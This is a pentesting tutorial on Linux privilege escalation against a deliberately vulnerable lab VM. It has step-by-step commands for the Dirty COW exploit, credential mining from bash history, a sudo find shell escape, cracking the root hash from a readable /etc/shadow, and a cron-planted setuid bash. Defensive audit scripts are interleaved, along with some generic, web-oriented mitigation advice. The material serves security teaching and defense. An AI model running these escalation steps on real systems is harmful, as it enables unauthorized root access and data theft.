
A Hands-On Approach To Linux Privilege Escalation: Tanishq Sharma, Shikhar Saxena

The document provides techniques for Linux privilege escalation attacks, including exploiting kernel vulnerabilities, password mining, sudo misconfigurations, file permission issues, and crontab jobs. It describes how attackers first gain initial access, then enumerate the system to find escalation opportunities. Examples are given where the attacker exploits the Dirty COW kernel bug, finds credentials in bash history, uses sudo to spawn a root shell, cracks the root password hash from /etc/shadow, and schedules a privileged bash script to run via crontab. Mitigation strategies include keeping critical data on the server-side and encoding/encrypting transmitted data.


A hands-on approach to Linux Privilege Escalation
Tanishq Sharma, Shikhar Saxena
INTRODUCTION

This document is intended to provide multiple techniques that a pentester can use to escalate their privileges and gain access to higher roles (for example, administrator or root).

Privilege escalation is a technique of exploiting a vulnerability or configuration on a web application or operating system to gain elevated access to permissions that should not be available to that user. After gaining escalated privileges the attacker can steal confidential data, deploy malware, and potentially do serious damage to an operating system.

Attackers start by enumerating the target machine to find information about the services that are running on it. After enumerating the target system the attacker plans the next steps and lists all the information gathered so far. Next the attacker makes sure that the vulnerability exists and exploits the privilege escalation vulnerability on the target machine, which lets them override the limitations of the current user account. Now the attacker can access the functionality and data of another user (horizontal privilege escalation) or obtain higher-level privileges, usually of an administrator or root (vertical privilege escalation).

With horizontal privilege escalation, the attacker remains at the same general user privilege but can access functionality or data of other accounts (having the same privilege). Example: for a web application it can be accessing other users' profiles on a social media platform, e-commerce site etc.

With vertical privilege escalation, attackers gain elevated privileges, typically of an administrator on Windows or a root user on a Unix/Linux system. Compared to horizontal privilege escalation it is more dangerous, as attackers get their privileges elevated from a lower-privileged shell/user to a higher-privileged shell/user. With these elevated privileges the attacker can steal all the sensitive information, run potentially dangerous commands, deploy malware on the system and seriously damage the operating system. Since the attacker has the higher-privileged account, they can cover their tracks by deleting access logs and other evidence of their activity. This way cybercriminals can steal sensitive information or deploy malware directly in company systems.

Lucideus 2020 2
Linux Privilege Escalation
Linux Privilege Escalation can be of many types, but the types which this document will cover are:

● Privilege Escalation by kernel exploit

● Privilege Escalation by Password Mining

● Privilege Escalation by Sudo

● Privilege Escalation by File Permissions

● Privilege Escalation by Crontab

1. First go to https://github.com/sagishahar/lpeworkshop and download the target machine from there, then import it in your VMware/VirtualBox software to set up the vulnerable environment.

2. In the git repo there are credentials provided for the machine:

Username: user and Password: password321

Username: root and Password: password123

3. Now log in to the machine and check the IP address using the ifconfig command; in our case it is 192.168.110.129.

4. Now the vulnerable machine is up and can be exploited.

Privilege Escalation by Kernel Exploit

1. Start by taking an SSH session on the victim machine using the command ssh user@192.168.110.129 (use the username: user and password: password321).

2. After getting the ssh of the victim machine try to do some system enumeration to get
some information about the target system by using commands like “uname -a” and “cat
/proc/version”.

3. After getting some information about the system, try to find an exploit for the corresponding Linux version. In this case the Linux version was vulnerable to the Dirty COW exploit.
A. The exploit can be found at: https://www.exploit-db.com/exploits/40839
B. Now copy the code of the exploit.
4. Now create a file by using the command “nano dirty.c” and paste the exploit code in the
file.
5. After this compile the exploit by using the command:
● gcc -pthread dirty.c -o dirty -lcrypt
6. After compiling the exploit, run the compiled file in this case “./dirty”.


7. While running, the exploit will ask you to enter a password, so enter any password that you can remember.

8. Now , to get the root privilege enter the below command:

● su firefart (it will prompt for password enter the password you entered at the time
when the exploit was executing).

Now we know that the exploit actually worked as we got the root privilege.
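On the defender's side, the published Dirty COW exploit used above gets root by writing a UID-0 account named "firefart" into /etc/passwd, which is why "su firefart" works afterwards. The following audit is an added example written for this edit (not code from the original document or from the lpeworkshop project) that parses /etc/passwd-format text and reports any UID-0 entry other than root, plus the case where the root entry itself is gone. The sample files are constructed; the tampered one models the exploit's new entry having overwritten the first line of the file.

```python
# Added example, not from the original document: audit /etc/passwd content for
# UID-0 accounts other than root. A second UID-0 user, or a missing root entry,
# is a strong indicator that something like exploit-db 40839 has been run.

def parse_passwd(text):
    """Yield (name, uid, shell) for each well-formed /etc/passwd line."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            continue  # malformed line: skip it rather than abort the audit
        name, _pw, uid, _gid, _gecos, _home, shell = fields
        yield name, int(uid), shell


def audit_passwd(text):
    """Return (rogue_uid0_accounts, root_present).

    rogue_uid0_accounts: names of UID-0 entries that are not literally "root".
    root_present: False if the "root" entry has been removed or renamed, which
    is what happens when an exploit overwrites the first line of the file.
    """
    rogue = []
    root_present = False
    for name, uid, _shell in parse_passwd(text):
        if uid != 0:
            continue
        if name == "root":
            root_present = True
        else:
            rogue.append(name)
    return rogue, root_present


# Constructed samples (not captured from a real system).
CLEAN_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
user:x:1000:1000:user,,,:/home/user:/bin/bash
"""

# Constructed: root's line replaced by the exploit's "firefart" entry.
TAMPERED_PASSWD = """\
firefart:x:0:0:pwned:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
user:x:1000:1000:user,,,:/home/user:/bin/bash
"""

if __name__ == "__main__":
    import sys
    path = sys.argv[1] if len(sys.argv) > 1 else "/etc/passwd"
    with open(path) as fh:
        rogue, root_present = audit_passwd(fh.read())
    for name in rogue:
        print(f"ALERT: non-root account with UID 0: {name}")
    if not root_present:
        print("ALERT: no 'root' entry with UID 0 found")
```

Run it against a live host (`python3 passwd_audit.py /etc/passwd`) from a file-integrity job; on the lab machine the real fix is the kernel update that closes Dirty COW, and an unexpected UID-0 entry is the signal that the update came too late.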

Privilege Escalation by Password Mining

1. Start by taking an SSH session on the victim machine using the command ssh user@192.168.110.129 (use the username: user and password: password321).

2. Now look into the commands that had been used in the target machine previously by
using command “history” or “cat .bash_history”.

3. From the output, we can see the credentials for MySQL; let's try to use these credentials to get root privilege.

From the above screenshot we can see that the credentials found from the history command also worked for the root user.
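The credential in the walkthrough was recoverable because a MySQL password was typed inline on the command line and then persisted in the shell history. The scanner here is an added example for this edit (not code from the original document or from the lpeworkshop project) that reads history text and reports lines carrying an inline secret, printing only a redacted hint so the report itself does not leak the value. The patterns and the sample history are constructed; extend the patterns for the tools used in your environment.

```python
import re

# Added example, not from the original document: find inline secrets in shell
# history so they can be rotated and the habit that leaked them corrected.
# Patterns are constructed for this example and cover a few common shapes.
SECRET_PATTERNS = [
    # mysql -u root -pSECRET  or  mysql ... --password=SECRET
    # (a bare "-p" that prompts interactively does not match)
    re.compile(r"\bmysql\b.*?(?:-p(?=\S)|--password=)(\S+)"),
    # sshpass -p SECRET ssh ...
    re.compile(r"\bsshpass\s+-p\s*(\S+)"),
    # DB_PASSWORD=SECRET, PASSWD=SECRET, API_TOKEN=SECRET (exported or inline)
    re.compile(r"(?:PASSWORD|PASSWD|TOKEN)=(\S+)", re.IGNORECASE),
    # curl -u user:SECRET ...
    re.compile(r"\bcurl\b.*?\s-u\s+[^:\s]+:(\S+)"),
]


def redact(secret):
    """Keep just enough of the value to recognise it; never log the whole secret."""
    return secret[:2] + "***"


def find_history_secrets(history_text):
    """Return [(line_number, redacted_secret), ...] for lines that expose a secret."""
    findings = []
    for lineno, line in enumerate(history_text.splitlines(), start=1):
        for pattern in SECRET_PATTERNS:
            m = pattern.search(line)
            if m:
                findings.append((lineno, redact(m.group(1))))
                break  # one finding per line is enough
    return findings


# Constructed sample history (not captured from a real system).
SAMPLE_HISTORY = """\
ls -la
mysql -u root -ppassword123
mysql -u root -p
sshpass -p hunter2 ssh admin@10.0.0.5
export DB_PASSWORD=s3cret
sudo -l
"""

if __name__ == "__main__":
    import os
    import sys
    path = sys.argv[1] if len(sys.argv) > 1 else os.path.expanduser("~/.bash_history")
    with open(path, errors="replace") as fh:
        for lineno, hint in find_history_secrets(fh.read()):
            print(f"{path}:{lineno}: inline secret {hint}")
```

Every hit is a credential to rotate, and the same password being valid for the root account (as it was in the walkthrough) is the reuse problem that makes a leaked service password a root compromise. Keeping secrets out of history in the first place means prompting for them (`mysql -p` with no value) or reading them from a file with restrictive permissions rather than the command line.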

Privilege Escalation by Sudo

1. Start by taking an SSH session on the victim machine using the command ssh user@192.168.110.129 (use the username: user and password: password321).

2. In command prompt type: sudo -l

From the output, notice the list of programs that can be executed via sudo.

3. Notice that the find command can be run via sudo, so we can use find command to
elevate our privilege by using the command “sudo find . -exec /bin/sh \; -quit”

Since find command was allowed to run via sudo we used it to escalate our privilege.
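The misconfiguration here is not sudo itself but granting a program that can run arbitrary commands, which GTFOBins (reference 2) catalogues. The parser below is an added example for this edit (not code from the original document or from the lpeworkshop project): it reads `sudo -l` output, splits each entry into the run-as user, tags such as NOPASSWD, and the individual commands, then flags `ALL` and any program on a watchlist. SHELL_CAPABLE is a short, constructed watchlist of well-known GTFOBins entries, not the full list; the sample output is constructed as well.

```python
import re

# Added example, not from the original document: review "sudo -l" output for
# entries that amount to a root shell. SHELL_CAPABLE is a constructed short
# watchlist drawn from well-known GTFOBins sudo entries; extend it as needed.
SHELL_CAPABLE = {
    "find", "vim", "vi", "less", "more", "awk", "perl", "python", "python3",
    "bash", "sh", "env", "nano",
}

# "(root) NOPASSWD: /usr/bin/find, /usr/bin/vim" -> runas, tags, command list
ENTRY_RE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z]+:\s*)*)(.+)$")


def parse_sudo_l(output):
    """Return a list of {runas, nopasswd, command} dicts, one per permitted command."""
    entries = []
    in_commands = False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_commands = True  # everything after this header is a rule
            continue
        if not in_commands:
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        runas, tags, commands = m.groups()
        for command in commands.split(","):
            entries.append({
                "runas": runas.strip(),
                "nopasswd": "NOPASSWD:" in tags,
                "command": command.strip(),
            })
    return entries


def risky_sudo_entries(output):
    """Return [(command, reason), ...] for entries that need review."""
    findings = []
    for entry in parse_sudo_l(output):
        command = entry["command"]
        if command == "ALL":
            findings.append((command, "unrestricted sudo"))
            continue
        program = command.split()[0].rsplit("/", 1)[-1]
        if program in SHELL_CAPABLE:
            findings.append((command, f"{program} can spawn a shell (see GTFOBins)"))
    return findings


# Constructed sample output (not captured from a real system).
SAMPLE_SUDO_L = """\
Matching Defaults entries for user on debian:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User user may run the following commands on debian:
    (root) NOPASSWD: /usr/bin/find, /bin/ping
    (root) /usr/bin/vim
"""

if __name__ == "__main__":
    for command, reason in risky_sudo_entries(SAMPLE_SUDO_L):
        print(f"review: {command}: {reason}")
```

Feed it the real output (`sudo -l -U someuser` as root, or each user's own `sudo -l`) when reviewing sudoers changes. The fix for a hit is to grant a narrower wrapper script owned by root, or to remove the rule, since restricting arguments in sudoers does not stop find's `-exec` or an editor's shell escape.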

Privilege Escalation by File Permissions

1. Start by taking an SSH session on the victim machine using the command ssh user@192.168.110.129 (use the username: user and password: password321).

2. In command prompt type: ls -al /etc/shadow

So we can see that the /etc/shadow file has read permission for all users, so a regular user is allowed to read this file.

3. In command prompt type: cat /etc/shadow

Copy the hash for the root user.


4. Now in your Attacker machine open the command prompt and type: echo “root_hash” >
hash.txt

5. After putting the hash in a file try to crack it by using the command: john
--wordlist=<path/to/wordlist> hash.txt

6. From the output, notice the cracked credentials; in this case it is "password123". Use it
to escalate your privilege.

From the above screenshot we can see that the credentials that we found from
cracking the hash worked for the root.
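Two things made this step work: /etc/shadow was readable by an ordinary user, and the root hash fell to a wordlist in seconds. The checks below are an added example for this edit (not code from the original document or from the lpeworkshop project). One inspects the mode of a file for the world read bit (the expected state on a Debian-style host is mode 0640, owner root, group shadow); the other classifies the hashing scheme of each shadow entry by its crypt(5) prefix so that md5crypt, legacy DES or empty password fields stand out. The sample shadow text is constructed and its hash values are placeholders, not real digests.

```python
import os
import stat

# Added example, not from the original document: check /etc/shadow exposure and
# the strength of the hashing scheme behind each entry.

# Hash prefix -> scheme name, following crypt(5) conventions.
HASH_SCHEMES = {
    "$1$": "md5crypt",
    "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
    "$5$": "sha256crypt",
    "$6$": "sha512crypt",
    "$y$": "yescrypt",
}
# Schemes a defender should want migrated, or the account locked.
WEAK_SCHEMES = {"md5crypt", "legacy DES", "empty", "unknown"}


def is_world_readable(mode):
    """True if the 'other' read bit is set on a file mode (st_mode)."""
    return bool(mode & stat.S_IROTH)


def shadow_file_check(path="/etc/shadow"):
    """Inspect a real file: returns (owner_uid, group_gid, world_readable)."""
    st = os.stat(path)
    return st.st_uid, st.st_gid, is_world_readable(st.st_mode)


def hash_scheme(field):
    """Classify the password field of one shadow entry."""
    if field == "":
        return "empty"
    if field.startswith(("!", "*")):
        return "locked"
    for prefix, name in HASH_SCHEMES.items():
        if field.startswith(prefix):
            return name
    if "$" not in field and len(field) == 13:
        return "legacy DES"  # traditional 13-character DES crypt output
    return "unknown"


def audit_shadow(text):
    """Return [(user, scheme), ...] for every entry in shadow-format text."""
    results = []
    for raw in text.splitlines():
        if not raw.strip() or raw.startswith("#"):
            continue
        fields = raw.split(":")
        if len(fields) < 2:
            continue
        results.append((fields[0], hash_scheme(fields[1])))
    return results


def weak_entries(text):
    """Entries whose password field needs attention."""
    return [(u, s) for u, s in audit_shadow(text) if s in WEAK_SCHEMES]


# Constructed sample; the hash values are placeholders, not real digests.
SAMPLE_SHADOW = """\
root:$1$fakesalt$fakemd5hashvalue:18000:0:99999:7:::
user:$6$fakesalt$fakesha512hashvalue:18000:0:99999:7:::
daemon:*:17000:0:99999:7:::
guest::18000:0:99999:7:::
"""

if __name__ == "__main__":
    uid, gid, world = shadow_file_check()
    print(f"/etc/shadow owner uid={uid} gid={gid} world-readable={world}")
    for user, scheme in weak_entries(SAMPLE_SHADOW):
        print(f"review: {user} uses {scheme}")
```

A world-readable shadow file is fixed with `chmod 0640 /etc/shadow` and `chown root:shadow /etc/shadow`; weak schemes are fixed by setting the ENCRYPT_METHOD in /etc/login.defs to SHA512 or YESCRYPT and forcing a password change, which is also where the "strong password policies" item under Mitigation below has its effect, since a slow hash only buys time against a weak password.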

Privilege Escalation by Crontab

1. Start by taking an SSH session on the victim machine using the command ssh user@192.168.110.129 (use the username: user and password: password321).

2. In the command prompt type: cat /etc/crontab

3. In the command prompt type: echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh


4. Give executable permission to overwrite.sh by using the command: chmod +x /home/user/overwrite.sh

5. Wait one minute for the cron job to run the script, then in your command prompt type: /tmp/bash -p

So we successfully elevated our privileges by using crontab.
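What made this work is a root cron job whose script an unprivileged user could write. Based on the file name and location the walkthrough uses, the assumption here is that the lab's /etc/crontab calls overwrite.sh by bare name and finds it in /home/user through the crontab's own PATH line. The audit below is an added example for this edit (not code from the original document or from the lpeworkshop project): it parses system-crontab text, resolves each root job's program through that PATH, and flags programs, or their parent directories, that a non-root user owns or can write. Filesystem metadata comes from a lookup function, so the block runs against a constructed fake filesystem here and against os.stat on a live host.

```python
import re
import stat
from collections import namedtuple

# Added example, not from the original document: find root cron jobs whose
# program (or the directory it lives in) a non-root user can modify.
FileInfo = namedtuple("FileInfo", "mode uid")

ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")
# Either "@reboot user cmd" or "m h dom mon dow user cmd" (system crontab format).
JOB_LINE = re.compile(r"^(@\w+|\S+\s+\S+\s+\S+\s+\S+\s+\S+)\s+(\S+)\s+(.+)$")
DEFAULT_PATH = ["/usr/bin", "/bin"]  # cron's PATH when the crontab sets none


def parse_system_crontab(text):
    """Return (path_dirs, [(schedule, user, command), ...])."""
    path_dirs, jobs = list(DEFAULT_PATH), []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if ENV_LINE.match(line):
            key, _, value = line.partition("=")
            if key == "PATH":  # the crontab's PATH decides where bare names resolve
                path_dirs = [d for d in value.strip('"').split(":") if d]
            continue
        m = JOB_LINE.match(line)
        if m:
            jobs.append(m.groups())
    return path_dirs, jobs


def resolve(program, path_dirs, lookup):
    """Absolute path the job will execute, or None if it cannot be found."""
    if program.startswith("/"):
        return program
    for d in path_dirs:
        candidate = d.rstrip("/") + "/" + program
        if lookup(candidate) is not None:
            return candidate
    return None


def writable_by_non_root(info):
    return info.uid != 0 or bool(info.mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_root_cron(text, lookup):
    """Return [(command, resolved_path, reason), ...] for risky root jobs."""
    path_dirs, jobs = parse_system_crontab(text)
    findings = []
    for _schedule, user, command in jobs:
        if user != "root":
            continue
        resolved = resolve(command.split()[0], path_dirs, lookup)
        if resolved is None:
            findings.append((command, None, "program not found on crontab PATH"))
            continue
        info = lookup(resolved)
        parent_info = lookup(resolved.rsplit("/", 1)[0] or "/")
        if info is not None and writable_by_non_root(info):
            findings.append((command, resolved, "script writable by non-root user"))
        elif parent_info is not None and writable_by_non_root(parent_info):
            findings.append((command, resolved, "parent directory writable by non-root user"))
    return findings


# Constructed sample crontab and fake filesystem (not from a real host).
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
* * * * * root overwrite.sh
*/5 * * * * root /usr/local/bin/compress.sh
@reboot user /home/user/start.sh
"""
FAKE_FS = {
    "/home/user": FileInfo(0o040755, 1000),
    "/home/user/overwrite.sh": FileInfo(0o100755, 1000),
    "/usr/local/bin": FileInfo(0o040755, 0),
    "/usr/local/bin/compress.sh": FileInfo(0o100755, 0),
}


def fake_lookup(path):
    return FAKE_FS.get(path)


def real_lookup(path):
    """Adapter for a live host: os.stat -> FileInfo, None if the path is missing."""
    import os
    try:
        st = os.stat(path)
    except OSError:
        return None
    return FileInfo(st.st_mode, st.st_uid)
```

On a live host call `audit_root_cron(open("/etc/crontab").read(), real_lookup)` and do the same for the files under /etc/cron.d. The remediation is to keep root job scripts root-owned in a root-owned directory and to drop user home directories from the crontab PATH; the end product of the attack, a setuid copy of bash in /tmp, is caught by a periodic scan for setuid files outside package-managed paths and prevented outright by mounting /tmp nosuid.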

Mitigation:

1. The most basic step in preventing a privilege escalation attack is to keep all the important information on the server side and send only session IDs to the client side. When all the critical information is stored on the server side it becomes difficult for an attacker to fetch the details and abuse them. For this kind of setup the session state of HTTP should be set to persistent.

2. Encoding and encryption is an essential step in protecting any information from an attacker. This technique adds another step, as the data needs to be encrypted and decrypted again and again.

3. Ensure that strong password policies are set up so that there is less chance of brute-forcing the password and escalating privileges.

4. All unused ports should be closed by default and all files should have read-only access enabled, giving write permissions only to the users and groups who need them.

5. Sanitize all user input, treating it as malicious. A whitelist of characters should be created and only those characters should be allowed.

6. Last but not least, all applications and systems should be patched and updated to the latest security version.

7. A WAF (Web Application Firewall) can also help in certain scenarios.

References:

1. https://www.exploit-db.com/exploits/40839
2. https://gtfobins.github.io/#+sudo
3. https://www.exploit-db.com/docs/46131
4. https://www.netsparker.com/blog/web-security/privilege-escalation/
5. https://github.com/sagishahar/lpeworkshop
6. https://drive.google.com/file/d/0B6EDpYQYL72rQ2VuWS1QR2ZsUlU/view
7. https://www.exploit-db.com/exploits/40839
